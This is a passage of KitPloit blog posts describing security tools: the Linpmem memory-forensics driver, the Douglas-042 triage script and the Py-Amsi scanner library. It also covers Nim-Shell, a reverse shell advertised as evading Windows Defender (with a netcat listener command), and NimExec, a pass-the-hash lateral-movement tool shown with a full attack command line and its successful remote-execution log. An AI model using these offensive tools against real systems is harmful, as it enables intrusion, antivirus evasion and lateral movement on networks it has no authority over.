you want to create a memory dump but can't compile on the target, you have to download the header package directly from the package <a href="https://www.kitploit.com/search/label/Repositories" target="_blank" title="repositories">repositories</a> of that system's Linux distribution. Double-check that the package version <em>exactly</em> matches the release and kernel version running on the foreign system. In case the other system is using a self-compiled kernel you have to obtain a copy of that kernel's build directory. Then, place the location of either directory in the <code>KDIR</code> environment variable.</p> <div><pre><code>export KDIR=path/to/extracted/header/package/or/kernel/root<br /></code></pre></div> <h3 dir="auto" tabindex="-1">Step 2 - make</h3> <p dir="auto">Compiling the driver is simple, just type:</p> <div><pre><code>make<br /></code></pre></div> <p dir="auto">This should produce <code>linpmem.ko</code> in the current working directory.</p> <p dir="auto">You might want to check <code>precompiler.h</code> before and chose whether to compile for release or debug (e.g., with debug printing). There aren't much other precompiler settings right now.</p> <h2 dir="auto" tabindex="-1">Loading The Driver</h2> <p dir="auto">The linpmem.ko module can be loaded by using <code>insmod path-to-linpmem.ko</code>, and unloaded with <code>rmmod path-to-linpmem.ko</code>. (This will load the driver only for this uptime.) If you compiled for debug, also take a look at dmesg.</p> <p dir="auto">After loading, for talking to the driver, you need to create the device:</p> <div><pre><code>mknod /dev/linpmem c 42 0<br /></code></pre></div> <p dir="auto">If you can't talk to the driver, potentially check in dmesg log to verify that '42' was indeed the registered major:</p> <div><pre><code>[12827.900168] linpmem: registered chrdev with major 42<br /></code></pre></div> <p dir="auto">Though usually the kernel would try to really assign this number.</p> <p dir="auto">You can use <code>chown</code> on the device to give it to your user, if you do not want to have a root console open all the time. (Or just keep using it in a root console.)</p> <ul dir="auto"> <li>Watch dmesg output. Please report errors if you see any!</li> <li>Warning: if there is a dmesg error print from Linpmem telling to reboot, better do it immediately.</li> <li>Warning: this is an early version.</li> </ul> <h2 dir="auto" tabindex="-1">Usage</h2> <h3 dir="auto" tabindex="-1">Demo Code</h3> <p dir="auto">There is an example code demonstrating and explaining (in detail) how to interact with the driver. The user-space API reference can furthermore be found in <code>./userspace_interface/linpmem_shared.h</code>.</p> <ol dir="auto"> <li>cd demo</li> <li>gcc -o test test.c</li> <li>(sudo) ./test // <= you need sudo if you did not use chown on the device.</li> </ol> <p dir="auto">This code is important, if you want to understand how to directly interact with the driver instead of using a <a href="https://github.com/Velocidex/Linpmem#libraries" rel="nofollow" target="_blank" title="library">library</a>. It can also be used as a short function test.</p> <h3 dir="auto" tabindex="-1">Command Line Interface Tool</h3> <p dir="auto">There is an (optional) basic <a href="https://www.kitploit.com/search/label/Command%20Line" target="_blank" title="command line">command line</a> interface tool to Linpmem, the <em>pmem CLI tool</em>. It can be found here: <a href="https://github.com/vobst/linpmem-cli" rel="nofollow" target="_blank" title="https://github.com/vobst/linpmem-cli">https://github.com/vobst/linpmem-cli</a>. Aside from the source code, there is also a precompiled CLI tool as well as the precompiled static library and headers that can be found <a href="https://github.com/vobst/linpmem-cli/releases/" rel="nofollow" target="_blank" title="here">here</a> (signed). Note: this is a preliminary version, be sure to check for updates, as many additions and enhancements will follow soon.</p> <p dir="auto">The pmem CLI tool can be used for testing the various functions of Linpmem in a (relatively) safe and convenient manner. Linpmem can also be loaded by this tool instead of using insmod/rmmod, with some extra options in future. This also has the advantage that pmem auto-creates the right device for you for immediate use. It is extremely portable and runs on any Linux system (and, in fact, has been tested even on a Linux 2.6).</p> <div><pre><code>$ ./pmem -h<br />Command-line client for the linpmem driver<br /><br />Usage: pmem [OPTIONS] [COMMAND]<br /><br />Commands:<br /> insmod Load the linpmem driver<br /> help Print this message or the help of the given subcommand(s)<br /><br />Options:<br /> -a, --address <ADDRESS> Address for physical read operations<br /> -v, --virt-address <VIRT_ADDRESS> Translate address in target process' address space (default: current process)<br /> -s, --size <SIZE> Size of buffer read operations<br /> -m, --mode <MODE> Access mode for read operations [possible values: byte, word, dword, qword, buffer]<br /> -p, --pid <PID> Target process for cr3 info and virtual-to-physical translations<br /> --cr3 Query cr3 value of target process (default: current process)<br /> --verbose Display debug output<br /> -h, --help Print help (see more with '--help')<br /> -V, --version Print version<br /></code></pre></div> <p dir="auto">If you want to compile the cli tool yourself, change to its directory and follow the instructions in the (cli) Readme to build it. Otherwise, just download the prebuilt program, it should work on <em>any</em> Linux. To load the <a href="https://www.kitploit.com/search/label/Kernel%20Driver" target="_blank" title="kernel driver">kernel driver</a> with the cli tool:</p> <div><pre><code># pmem insmod path/to/linpmem.ko<br /></code></pre></div> <p dir="auto">The advantage of using the pmem tool to load the driver is that you do not have to create the device file yourself, and it will offer (on next releases) to choose who owns the linpmem device.</p> <h3 dir="auto" tabindex="-1">Libraries</h3> <p dir="auto">The <a href="https://github.com/Velocidex/Linpmem#command-line-interface-tool" rel="nofollow" target="_blank" title="pmem command line interface">pmem command line interface</a> is only a thin wrapper around a small Rust library that exposes an API for interfacing with the driver. More advanced users can also use this library. The library is automatically compiled (as static portable library) along with the pmem cli tool when compiling from <a href="https://github.com/vobst/linpmem-cli" rel="nofollow" target="_blank" title="https://github.com/vobst/linpmem-cli">https://github.com/vobst/linpmem-cli</a>, but also included (precompiled) <a href="https://github.com/vobst/linpmem-cli/releases/" rel="nofollow" target="_blank" title="here">here</a> (signed). Note: this is a preliminary version, more to follow soon.</p> <p dir="auto">If you do not want to use the usermode library and prefer to interface with the driver directly on your own, you can find its user-space API/interface and documentation in <code>./userspace_interface/linpmem_shared.h</code>. We also provide example code in <code>demo/test.c</code> that explains how to use the driver directly.</p> <h3 dir="auto" tabindex="-1">Memdumping tool</h3> <p dir="auto">Not implemented yet.</p> <h2 dir="auto" tabindex="-1">Tested Linux Distributions</h2> <ul dir="auto"> <li>Debian, self-compiled 6.4.X, Qemu/KVM, not paravirtualized. <ul dir="auto"> <li>PTI: off/on</li> </ul> </li> <li>Debian 12, Qemu/KVM, fully paravirtualized. <ul dir="auto"> <li>PTI: on</li> </ul> </li> <li>Ubuntu server, Qemu/KVM, not paravirtualized. <ul dir="auto"> <li>PTI: on</li> </ul> </li> <li>Fedora 38, Qemu/KVM, fully paravirtualized. <ul dir="auto"> <li>PTI: on</li> </ul> </li> <li>Baremetal Linux test, AMI BIOS: Linux 6.4.4 <ul dir="auto"> <li>PTI: on</li> </ul> </li> <li>Baremetal Linux test, HP: Linux 6.4.4 <ul dir="auto"> <li>PTI: on</li> </ul> </li> <li>Baremetal, Arch[-hardened], Dell BIOS, Linux 6.4.X</li> <li>Baremetal, Debian, 6.1.X</li> <li>Baremetal, Ubuntu 20.04 with Secure Boot on. Works, but <a href="https://github.com/Velocidex/Linpmem#handling-secure-boot" rel="nofollow" target="_blank" title="sign">sign</a> driver first.</li> <li>Baremetal, Ubuntu 22.04, Linux 6.2.X</li> </ul> <h2 dir="auto" tabindex="-1">Handling Secure Boot</h2> <p dir="auto">If the system reports the following error message when loading the module, it might be because of secure boot:</p> <div><pre><code>$ sudo insmod linpmem.ko<br />insmod: ERROR: could not insert module linpmem.ko: Operation not permitted<br /></code></pre></div> <p dir="auto">There are different ways to still load the module. The obvious one is to disable secure boot in your UEFI settings.</p> <p dir="auto">If your distribution supports it, a more elegant solution would be to sign the module before using it. This can be done using the following steps (tested on Ubuntu 20.04).</p> <ol dir="auto"> <li>Install mokutil: <div><pre><code>$ sudo apt install mokutil<br /></code></pre></div> </li> <li>Create the singing key material: <div><pre><code>$ openssl req -new -newkey rsa:4096 -keyout mok-signing.key -out mok-signing.crt -outform DER -days 365 -nodes -subj "/CN=Some descriptive name/"<br /></code></pre></div> Make sure to adjust the options to your needs. Especially, consider the key length (-newkey), the validity (-days), the option to set a key pass phrase (-nodes; leave it out, if you want to set a pass phrase), and the common name to include into the certificate (-subj).</li> <li>Register the new MOK: <div><pre><code>$ sudo mokutil --import mok-signing.crt<br /></code></pre></div> You will be asked for a password, which is required in the following step. Consider using a password, which you can type on a US keyboard layout.</li> <li>Reboot the system. It will enter a MOK enrollment menu. Follow the instructions to enroll your new key.</li> <li>Sign the module Once the MOK is enrolled, you can sign your module. <div><pre><code>$ /usr/src/linux-headers-$(uname -r)/scripts/sign-file sha256 path/to/mok-singing/MOK.key path/to//MOK.cert path/to/linpmem.ko<br /></code></pre></div> </li> </ol> <p dir="auto">After that, you should be able to load the module.</p> <p dir="auto">Note that from a forensic-readiness perspective, you should prepare a signed module <strong>before</strong> you need it, as the system will reboot twice during the process described above, destroying most of your volatile data in memory.</p> <h2 dir="auto" tabindex="-1">Known Issues</h2> <ul dir="auto"> <li>Huge page read is not implemented. Linpmem recognizes a huge page and rejects the read, for now.</li> <li>Reading from mapped io and DMA space will be done with CPU caching enabled.</li> <li>No locks are taken during the page table walk. This might lead to funny results when concurrent modifications are going on. This is a general and (mostly unsolvable) problem of live RAM reading, without halting the entire OS to full stop.</li> <li>Secure Boot (Ubuntu): please <a href="https://github.com/Velocidex/Linpmem#handling-secure-boot" rel="nofollow" target="_blank" title="sign">sign</a> your driver prior to using.</li> <li>Any CPU-powered memory encryption, e.g., AMD SME, Intel SGX/TDX, ...</li> <li>Pluton chips?</li> </ul> <p dir="auto">(Please report potential issues if you encounter anything.)</p> <h2 dir="auto" tabindex="-1">Under work</h2> <ul dir="auto"> <li>Loading precompiled driver on any Linux.</li> <li>Processor cache control. Example: for uncached reading of mapped I/O and DMA space.</li> </ul> <h2 dir="auto" tabindex="-1">Future work</h2> <ul dir="auto"> <li>Arm/Mips support. (far future work)</li> <li>Legacy kernels (such as 2.6), unix-based kernels</li> </ul> <h2 dir="auto" tabindex="-1">Acknowledgements</h2> <p dir="auto"><a href="https://github.com/Velocidex/Linpmem" rel="nofollow" target="_blank" title="Linpmem">Linpmem</a>, as well as <a href="https://github.com/Velocidex/WinPmem" rel="nofollow" target="_blank" title="Winpmem">Winpmem</a>, would not exist without the work of our predecessors of the (now retired) REKALL project: <a href="https://github.com/google/rekall" rel="nofollow" target="_blank" title="https://github.com/google/rekall">https://github.com/google/rekall</a>.</p> <ul dir="auto"> <li>We would like to thank Mike Cohen and Johannes Stüttgen for their pioneer work and open source contribution on PTE remapping, a technique which is still in use 10 years later.</li> </ul> <p dir="auto">Our open source contributors:</p> <ul dir="auto"> <li>Viviane Zwanger</li> <li>Valentin Obst</li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/Velocidex/Linpmem" rel="nofollow" target="_blank" title="Download Linpmem">Download Linpmem</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-68604702070080608192023-12-16T08:30:00.006-03:002023-12-16T08:30:00.136-03:00Nim-Shell - Reverse Shell That Can Bypass Windows Defender Detection<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjA4OOLyqJOKkIzObBgTKvN9pXfBYPf_s_giBmPdyHwBKL1OMfJrbAo5DMmgSUkUxZbwtAxXyV4TxUhgCtPU4nzJoC0xbLJltrgrtZBb5opuht8FmNB4uVe7Zdw_aMA4ZMCb5I30JbSRMizQpHIHehlCviTJBf2LFUbxT4jfoaJVAhZWCPYMo8gKzihgG-H"><img alt="" border="0" height="192" id="BLOGGER_PHOTO_ID_7308983051732476274" src="https://blogger.googleusercontent.com/img/a/AVvXsEjA4OOLyqJOKkIzObBgTKvN9pXfBYPf_s_giBmPdyHwBKL1OMfJrbAo5DMmgSUkUxZbwtAxXyV4TxUhgCtPU4nzJoC0xbLJltrgrtZBb5opuht8FmNB4uVe7Zdw_aMA4ZMCb5I30JbSRMizQpHIHehlCviTJBf2LFUbxT4jfoaJVAhZWCPYMo8gKzihgG-H=w640-h192" width="640" /></a></p><div><br /></div> <p dir="auto">Reverse shell that can bypass <a href="https://www.kitploit.com/search/label/Windows%20Defender" target="_blank" title="windows defender">windows defender</a> detection</p><span><a name='more'></a></span><p dir="auto"><br /></p> <div><pre><code>$ apt install nim<br /></code></pre></div> <h1 dir="auto" tabindex="-1">Compilation</h1> <p dir="auto">nim c -d:mingw --app:gui nimshell.nim</p> <p dir="auto" style="text-align: center;"><a href="https://github.com/emrekybs/nim-shell/blob/main/1.png" rel="nofollow" target="_blank" title="Reverse shell that can bypass windows defender detection (3)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjA4OOLyqJOKkIzObBgTKvN9pXfBYPf_s_giBmPdyHwBKL1OMfJrbAo5DMmgSUkUxZbwtAxXyV4TxUhgCtPU4nzJoC0xbLJltrgrtZBb5opuht8FmNB4uVe7Zdw_aMA4ZMCb5I30JbSRMizQpHIHehlCviTJBf2LFUbxT4jfoaJVAhZWCPYMo8gKzihgG-H"><img alt="" border="0" height="192" id="BLOGGER_PHOTO_ID_7308983051732476274" src="https://blogger.googleusercontent.com/img/a/AVvXsEjA4OOLyqJOKkIzObBgTKvN9pXfBYPf_s_giBmPdyHwBKL1OMfJrbAo5DMmgSUkUxZbwtAxXyV4TxUhgCtPU4nzJoC0xbLJltrgrtZBb5opuht8FmNB4uVe7Zdw_aMA4ZMCb5I30JbSRMizQpHIHehlCviTJBf2LFUbxT4jfoaJVAhZWCPYMo8gKzihgG-H=w640-h192" width="640" /></a></p> <p dir="auto">Change the IP address and port number you want to listen to in the nimshell.nim file according to your device.</p> <p dir="auto" style="text-align: center;"><a href="https://github.com/emrekybs/nim-shell/blob/main/2.png" rel="nofollow" target="_blank" title="Reverse shell that can bypass windows defender detection (4)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEirE2jlCWOsiiK0tmCnN24MtHWXS-INsTNAbbUBXN30MXcYBPgGA4l4qiBB-4yexv1Vv7YSp8iOliPbPwxA_g76HokZjXmyXkHqDRTd63b9Q4wjKFNHJv9tmJlO68jeNt110_QBhbtAC_FqenkUKSRU-QAfvHzIuHDvDEL7Y6osNMF3yxbfDQHUKLT4dWoM"><img alt="" border="0" height="284" id="BLOGGER_PHOTO_ID_7308983073899144738" src="https://blogger.googleusercontent.com/img/a/AVvXsEirE2jlCWOsiiK0tmCnN24MtHWXS-INsTNAbbUBXN30MXcYBPgGA4l4qiBB-4yexv1Vv7YSp8iOliPbPwxA_g76HokZjXmyXkHqDRTd63b9Q4wjKFNHJv9tmJlO68jeNt110_QBhbtAC_FqenkUKSRU-QAfvHzIuHDvDEL7Y6osNMF3yxbfDQHUKLT4dWoM=w640-h284" width="640" /></a></p> <h1 dir="auto" tabindex="-1">and listen</h1> <div><pre><code> $ nc -nvlp 4444<br /></code></pre></div> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/emrekybs/nim-shell" rel="nofollow" target="_blank" title="Download Nim-Shell">Download Nim-Shell</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-3655731829596651402023-12-11T08:30:00.001-03:002023-12-11T08:30:00.126-03:00Douglas-042 - Powershell Script To Help Speed Up Threat Hunting Incident Response Processes<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh87xJjzyBL9Nfn-L1sLThip0y8letsw6mpq_GvAMnoBsWTWZkhIw9fjnuEsNU0sB88mL3sSW_mY7OS2t01LSY1uRyOTZ3_orVdIHjG95JqtgSn04lrB4w6-KynDLgAes-XzMzgr_ZMyQlrorFALv8AvFtUBLjhsl8soPah5NxFY0hrjGY_ltr2Vjrix7zn"><img alt="" border="0" height="394" id="BLOGGER_PHOTO_ID_7308982525197249218" src="https://blogger.googleusercontent.com/img/a/AVvXsEh87xJjzyBL9Nfn-L1sLThip0y8letsw6mpq_GvAMnoBsWTWZkhIw9fjnuEsNU0sB88mL3sSW_mY7OS2t01LSY1uRyOTZ3_orVdIHjG95JqtgSn04lrB4w6-KynDLgAes-XzMzgr_ZMyQlrorFALv8AvFtUBLjhsl8soPah5NxFY0hrjGY_ltr2Vjrix7zn=w400-h394" width="400" /></a></p> <p dir="auto"><br /></p><p dir="auto">DOUGLAS-042 stands as an ingenious embodiment of a PowerShell script meticulously designed to expedite the triage process and facilitate the meticulous collection of crucial evidence derived from both forensic artifacts and the ephemeral landscape of volatile data. Its fundamental mission revolves around providing indispensable aid in the arduous task of pinpointing potential security breaches within <a href="https://www.kitploit.com/search/label/Windows" target="_blank" title="Windows">Windows</a> ecosystems. With an overarching focus on expediency, DOUGLAS-042 orchestrates the efficient prioritization and methodical aggregation of data, ensuring that no vital piece of information eludes scrutiny when investigating a possible compromise. As a testament to its organized approach, the amalgamated data finds its sanctuary within the confines of a meticulously named text file, bearing the nomenclature of the host system's very own hostname. This practice of meticulous data archival emerges not just as a systematic convention, but as a cornerstone that paves the way for seamless transitions into subsequent stages of the <a href="https://www.kitploit.com/search/label/Forensic" target="_blank" title="Forensic">Forensic</a> journey.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h3 dir="auto" tabindex="-1">Content Queries</h3> <ul dir="auto"> <li>General information</li> <li>Accountand group information</li> <li>Network</li> <li>Process Information</li> <li>OS Build and HOTFIXE</li> <li>Persistence</li> <li>HARDWARE Information</li> <li>Encryption information</li> <li>FIREWALL INFORMATION</li> <li>Services</li> <li>History</li> <li>SMB Queries</li> <li>Remoting queries</li> <li>REGISTRY Analysis</li> <li>LOG queries</li> <li>Instllation of Software</li> <li>User activity</li> </ul> <h3 dir="auto" tabindex="-1">Advanced Queries</h3> <ul dir="auto"> <li>Prefetch file information</li> <li>DLL List</li> <li>WMI filters and consumers</li> <li>Named pipes</li> </ul> <h1 dir="auto" tabindex="-1">Usage</h1> <p dir="auto">Using administrative privileges, just run the script from a PowerShell console, then the results will be saved in the <a href="https://www.kitploit.com/search/label/Directory" target="_blank" title="directory">directory</a> as a txt file.</p> <div><pre><code>$ PS >./douglas.ps1<br /></code></pre></div> <h1 dir="auto" tabindex="-1">Advance usage</h1> <div><pre><code>$ PS >./douglas.ps1 -a<br /></code></pre></div> <p dir="auto" style="text-align: center;"><a href="https://github.com/emrekybs/Douglas-042/blob/main/png.jpg" rel="nofollow" target="_blank" title="Powershell script to help Speed &#8203;&#8203;up Threat hunting incident response processes (8)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhffHE0HFDOlGVEmFfvyXXQPby69cCQHjNY9yF1NQ_wvp6qyEviF0ZmuhDx3fFS_jrhGAZGM52ClA-imLbpzox_M_QkcnugEiawyBnT8c0F4b8YOOStwOT9KuDeNMCJxK1wh4ALhUsYd6a66gtw4KhJ03bywBWBx9HPt3wnf6P1TLkhjiM5jdbzv44r3Z9J"><img alt="" border="0" height="374" id="BLOGGER_PHOTO_ID_7308982540211377170" src="https://blogger.googleusercontent.com/img/a/AVvXsEhffHE0HFDOlGVEmFfvyXXQPby69cCQHjNY9yF1NQ_wvp6qyEviF0ZmuhDx3fFS_jrhGAZGM52ClA-imLbpzox_M_QkcnugEiawyBnT8c0F4b8YOOStwOT9KuDeNMCJxK1wh4ALhUsYd6a66gtw4KhJ03bywBWBx9HPt3wnf6P1TLkhjiM5jdbzv44r3Z9J=w640-h374" width="640" /></a></p> <div><br /></div><div><h1 dir="auto" tabindex="-1">Video</h1><p dir="auto" style="text-align: center;"><iframe allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/8KVeNvA6M0s?si=qtR0JWWC88p-DpBm" title="YouTube video player" width="560"></iframe></p></div><div><br /></div><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/emrekybs/Douglas-042" rel="nofollow" target="_blank" title="Download Douglas-042">Download Douglas-042</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-20618784505919406182023-12-10T08:30:00.001-03:002023-12-10T08:30:00.133-03:00Py-Amsi - Scan Strings Or Files For Malware Using The Windows Antimalware Scan Interface<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhB9D-cT44KnDO69VmfDyb18zF51HFNVnpqyu0mCAT6K6CjgtgcJeptJIy5UXl1s7R_z9CZx5YIVh6Ch2qztAST46sDkkwrytivc7lUrQecETGulxpno26zBVYEK5An44SDyyOPUMdGTdRzR_ifqX4RChZJGEfb89t0hSBm6kZeXcZ4TBtUr5j3as1JCL8Y/s1792/Py-Amsi.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1024" data-original-width="1792" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhB9D-cT44KnDO69VmfDyb18zF51HFNVnpqyu0mCAT6K6CjgtgcJeptJIy5UXl1s7R_z9CZx5YIVh6Ch2qztAST46sDkkwrytivc7lUrQecETGulxpno26zBVYEK5An44SDyyOPUMdGTdRzR_ifqX4RChZJGEfb89t0hSBm6kZeXcZ4TBtUr5j3as1JCL8Y/w640-h366/Py-Amsi.png" width="640" /></a></div><p><br /></p> <p dir="auto">py-amsi is a <a href="https://www.kitploit.com/search/label/Library" target="_blank" title="library">library</a> that scans strings or files for <a href="https://www.kitploit.com/search/label/Malware" target="_blank" title="malware">malware</a> using the Windows Antimalware Scan Interface (AMSI) API. AMSI is an interface native to Windows that allows applications to ask the <a href="https://www.kitploit.com/search/label/Antivirus" target="_blank" title="antivirus">antivirus</a> installed on the system to analyse a file/string. AMSI is not tied to <a href="https://www.kitploit.com/search/label/Windows" target="_blank" title="Windows">Windows</a> Defender. Antivirus providers implement the AMSI interface to receive calls from applications. This library takes advantage of the API to make antivirus scans in python. Read more about the Windows AMSI API <a href="https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" rel="nofollow" target="_blank" title="here">here</a>.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto" tabindex="-1">Installation</h2> <ul dir="auto"> <li> <p dir="auto">Via pip</p> <div><pre><code>pip install pyamsi<br /></code></pre></div> </li> <li> <p dir="auto">Clone repository</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="git clone https://github.com/Tomiwa-Ot/py-amsi.git cd py-amsi/ python setup.py install" dir="auto"><pre><code>git clone https://github.com/Tomiwa-Ot/py-amsi.git<br />cd py-amsi/<br />python setup.py install</code></pre></div> </li> </ul> <h2 dir="auto" tabindex="-1">Usage</h2> <div class="highlight highlight-source-python notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="from pyamsi import Amsi # Scan a file Amsi.scan_file(file_path, debug=True) # debug is optional and False by default # Scan string Amsi.scan_string(string, string_name, debug=False) # debug is optional and False by default # Both functions return a <a title=" dictionary="" href="https://www.kitploit.com/search/label/Dictionary">dictionary of the format # { # 'Sample Size' : 68, // The string/file size in bytes # 'Risk Level' : 0, // The risk level as suggested by the antivirus # 'Message' : 'File is clean' // Response message # }" dir="auto"><pre><code>from pyamsi import Amsi<br /><br /># Scan a file<br />Amsi.scan_file(file_path, debug=True) # debug is optional and False by default<br /><br /># Scan string<br />Amsi.scan_string(string, string_name, debug=False) # debug is optional and False by default<br /><br /># Both functions return a dictionary of the format<br /># {<br /># 'Sample Size' : 68, // The string/file size in bytes<br /># 'Risk Level' : 0, // The risk level as suggested by the antivirus<br /># 'Message' : 'File is clean' // Response message<br /># }</code></pre></div> <table> <tbody><tr> <th>Risk Level</th> <th>Meaning</th> </tr> <tr> <td>0</td> <td>AMSI_RESULT_CLEAN (File is clean)</td> </tr> <tr> <td>1</td> <td>AMSI_RESULT_NOT_DETECTED (No threat detected)</td> </tr> <tr> <td>16384</td> <td>AMSI_RESULT_BLOCKED_BY_ADMIN_START (Threat is blocked by the administrator)</td> </tr> <tr> <td>20479</td> <td>AMSI_RESULT_BLOCKED_BY_ADMIN_END (Threat is blocked by the administrator)</td> </tr> <tr> <td>32768</td> <td>AMSI_RESULT_DETECTED (File is considered malware)</td> </tr> </tbody></table> <h2 dir="auto" tabindex="-1">Docs</h2> <p dir="auto"><a href="https://tomiwa-ot.github.io/py-amsi/index.html" rel="nofollow" target="_blank" title="https://tomiwa-ot.github.io/py-amsi/index.html">https://tomiwa-ot.github.io/py-amsi/index.html</a></p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/Tomiwa-Ot/py-amsi" rel="nofollow" target="_blank" title="Download Py-Amsi">Download Py-Amsi</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-44125323452681333332023-12-03T08:30:00.004-03:002023-12-03T08:30:00.128-03:00NimExec - Fileless Command Execution For Lateral Movement In Nim<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjk1EoP90lrG2ujqtjTqrJL_aW4ZxzE88p1FD7BqJNW4D9glJ1u62AJZhb92LeKyv9k6Y0QQgTrf08Da5HyRKXXt_QZar0aFMWRow793d7NLESQ9enIhUiLuE9_BQEoPzMHWVpx85kRulTOXwkQ-pqeFPDnOQd0TKSL9poYfvo5qidaAA8_9aQCH9jDKHDC/s1792/NimExec.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1024" data-original-width="1792" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjk1EoP90lrG2ujqtjTqrJL_aW4ZxzE88p1FD7BqJNW4D9glJ1u62AJZhb92LeKyv9k6Y0QQgTrf08Da5HyRKXXt_QZar0aFMWRow793d7NLESQ9enIhUiLuE9_BQEoPzMHWVpx85kRulTOXwkQ-pqeFPDnOQd0TKSL9poYfvo5qidaAA8_9aQCH9jDKHDC/w640-h366/NimExec.png" width="640" /></a></div><p><br /></p> <p dir="auto">Basically, NimExec is a <a href="https://www.kitploit.com/search/label/Fileless" target="_blank" title="fileless">fileless</a> <a href="https://www.kitploit.com/search/label/Remote%20Command%20Execution" target="_blank" title="remote command execution">remote command execution</a> tool that uses The Service Control Manager Remote Protocol (MS-SCMR). It changes the binary path of a random or given service run by LocalSystem to execute the given command on the target and restores it later via hand-crafted RPC packets instead of WinAPI calls. It sends these packages over SMB2 and the svcctl named pipe.</p> <p dir="auto">NimExec needs an NTLM hash to authenticate to the target machine and then completes this authentication process with the NTLM <a href="https://www.kitploit.com/search/label/Authentication" target="_blank" title="Authentication">Authentication</a> method over hand-crafted packages.</p> <p dir="auto">Since all required network packages are manually crafted and no operating system-specific functions are used, NimExec can be used in different operating systems by using Nim's cross-compilability support.</p> <p dir="auto">This project was inspired by <a href="https://github.com/juliourena/SharpNoPSExec" rel="nofollow" target="_blank" title="Julio's SharpNoPSExec">Julio's SharpNoPSExec</a> tool. You can think that NimExec is Cross Compilable and built-in Pass the Hash supported version of SharpNoPSExec. Also, I learned the required network packet structures from <a href="https://github.com/Kevin-Robertson/Invoke-TheHash/blob/master/Invoke-SMBExec.ps1" rel="nofollow" target="_blank" title="Kevin Robertson's Invoke-SMBExec Script">Kevin Robertson's Invoke-SMBExec Script</a>.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h1 dir="auto" tabindex="-1">Compilation</h1> <div><pre><code>nim c -d:release --gc:markAndSweep -o:NimExec.exe Main.nim<br /></code></pre></div> <p dir="auto">The above command uses a different Garbage Collector because the default garbage collector in Nim is throwing some SIGSEGV errors during the service searching process.</p> <p dir="auto">Also, you can install the required Nim modules via Nimble with the following command:</p> <div><pre><code>nimble install ptr_math nimcrypto hostname<br /></code></pre></div> <h1 dir="auto" tabindex="-1">Usage</h1> <div><pre><code>test@ubuntu:~/Desktop/NimExec$ ./NimExec -u testuser -d TESTLABS -h 123abcbde966780cef8d9ec24523acac -t 10.200.2.2 -c 'cmd.exe /c "echo test > C:\Users\Public\test.txt"' -v<br /> <br /> _..._ <br /> .-'_..._''. <br /> _..._ .--. __ __ ___ __.....__ __.....__ .' .' '.\ <br /> .' '. |__|| |/ `.' `. .-'' '. .-'' '. / .' <br />. .-. ..--.| .-. .-. ' / .-''"'-. `. / .-''"'-. `. . ' <br />| ' ' || || | | | | |/ /________\ \ ____ _____/ /________\ \| | <br />| | | || || | | | | || |`. \ .' /| || | <br />| | | || || | | | | |\ .--- ----------' `. `' .' \ .-------------'. ' <br />| | | || || | | | | | \ '-.____...---. '. .' \ '-.____...---. \ '. . <br />| | | ||__||__| |__| |__| `. .' .' `. `. .' '. `._____.-'/ <br />| | | | `''-...... -' .' .'`. `. `''-...... -' `-.______ / <br />| | | | .' / `. `. ` <br />'--' '--' '----' '----' <br /><br /> @R0h1rr1m <br /><br /><br />[+] Connected to 10.200.2.2:445<br />[+] NTLM Authentication with Hash is succesfull!<br />[+] Connected to IPC Share of target!<br />[+] Opened a handle for svcctl pipe!<br />[+] Bound to the RPC Interface!<br />[+] RPC Binding is acknowledged!<br />[+] SCManager handle is obtained!<br />[+] Number of obtained services: 265<br />[+] Selected service is LxpSvc<br />[+] Service: LxpSvc is opened!<br />[+] Previous Service Path is: C:\Windows\system32\svchost.exe -k netsvcs<br />[+] Service config is changed!<br />[!] StartServiceW Return Value: 1053 (ERROR_SERVICE_REQUEST_TIMEOUT)<br />[+] Service start request is sent!<br />[+] Service config is restored!<br />[+] Service handle is closed!<br />[+] Service Manager handle is closed!<br />[+] SMB is closed!<br />[+] Tree is disconnected!<br />[+] Session logoff!<br /></code></pre></div> <p dir="auto">It's tested against Windows 10&11, Windows Server 16&19&22 from Ubuntu 20.04 and <a href="https://www.kitploit.com/search/label/Windows%2010" target="_blank" title="Windows 10">Windows 10</a> machines.</p> <h1 dir="auto" tabindex="-1">Command Line Parameters</h1> <div><pre><code> -v | --verbose Enable more verbose output.<br /> -u | --username <Username> Username for NTLM Authentication.*<br /> -h | --hash <NTLM Hash> NTLM password hash for NTLM Authentication.*<br /> -t | --target <Target> Lateral movement target.*<br /> -c | --command <Command> Command to execute.*<br /> -d | --domain <Domain> Domain name for NTLM Authentication.<br /> -s | --service <Service Name> Name of the service instead of a random one.<br /> --help Show the help message.<br 